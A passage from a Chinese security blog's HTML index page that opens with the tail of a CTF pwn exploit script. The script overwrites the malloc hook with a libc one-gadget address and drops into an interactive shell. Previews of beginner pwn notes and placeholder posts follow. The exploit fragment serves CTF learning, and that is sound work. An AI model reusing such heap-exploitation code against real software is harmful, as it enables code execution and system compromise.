class="number">0x38</span>)<span class="comment">#9</span></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">6</span> + p64(des_addr-<span class="number">56</span>)</span><br><span class="line">update(<span class="number">9</span>,len(payload),payload)</span><br><span class="line"><span class="comment">#--change mallloc hook</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#10</span></span><br><span class="line">payload2 = libcc + <span class="number">0x4526a</span></span><br><span class="line">update(<span class="number">10</span>,len(p64(payload2)),p64(payload2))</span><br><span class="line"><span class="keyword">new</span>(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>







<h2 id="pwn4"><a href="#pwn4" class="headerlink" title="pwn4"></a>pwn4</h2><h2 id="pwn33"><a href="#pwn33" class="headerlink" title="pwn33"></a>pwn33</h2><h2 id="pwn55"><a href="#pwn55" class="headerlink" title="pwn55"></a>pwn55</h2>
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/" class="post-title-link" itemprop="url">pwn入门到放弃笔记</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-01-15 20:58:15 / Modified: 21:16:06" itemprop="dateCreated datePublished" datetime="2022-01-15T20:58:15+08:00">2022-01-15</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sec/" itemprop="url" rel="index"><span itemprop="name">sec</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="简述1"><a href="#简述1" class="headerlink" title="简述1"></a>简述1</h1><p>栈（stack）：存放局部变量，如函数的参数、返回地址、局部变量等，由系统自动分配和释放</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2022/01/15/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83%E7%AC%94%E8%AE%B0/#more" rel="contents">
                Read more &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/" class="post-title-link" itemprop="url">gitee_blog测试</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-01-13 00:11:19" itemprop="dateCreated datePublished" datetime="2022-01-13T00:11:19+08:00">2022-01-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-01-15 21:16:25" itemprop="dateModified" datetime="2022-01-15T21:16:25+08:00">2022-01-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%9D%82%E4%B8%83%E6%9D%82%E5%85%AB/" itemprop="url" rel="index"><span itemprop="name">杂七杂八</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>描述就不描述了</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/">
                Read more &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://ton_andy.gitee.io/2022/01/12/hello-world/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="dong">
      <meta itemprop="description" content="数据方面、网络安全方面的记事本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dong's blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/01/12/hello-world/" class="post-title-link" itemprop="url">Hello World</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-01-12 23:24:35" itemprop="dateCreated datePublished" datetime="2022-01-12T23:24:35+08:00">2022-01-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-01-15 21:16:28" itemprop="dateModified" datetime="2022-01-15T21:16:28+08:00">2022-01-15</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>Welcome to <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a target="_blank" rel="noopener" href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a target="_blank" rel="noopener" href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a target="_blank" rel="noopener" href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2022/01/12/hello-world/#more" rel="contents">
                Read more &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  


  



          </div>
          

<script>
  // Restore the comment tab the reader last used (or the configured default) once the
  // theme signals that the tab widgets are registered.
  window.addEventListener('tabs:register', function () {
    var selected = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      // A choice persisted by the 'tabs:click' handler below wins over the configured default.
      selected = localStorage.getItem('comments_active') || selected;
    }
    if (!selected) return;
    var tabLink = document.querySelector('a[href="#comment-' + selected + '"]');
    if (tabLink) tabLink.click();
  });
  if (CONFIG.comments.storage) {
    // Remember which comment pane was activated so it can be restored on the next page load.
    window.addEventListener('tabs:click', function (event) {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      localStorage.setItem('comments_active', event.target.classList[1]);
    });
  }
</script>

        </div>
          
  


      </div>
    </main>

  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
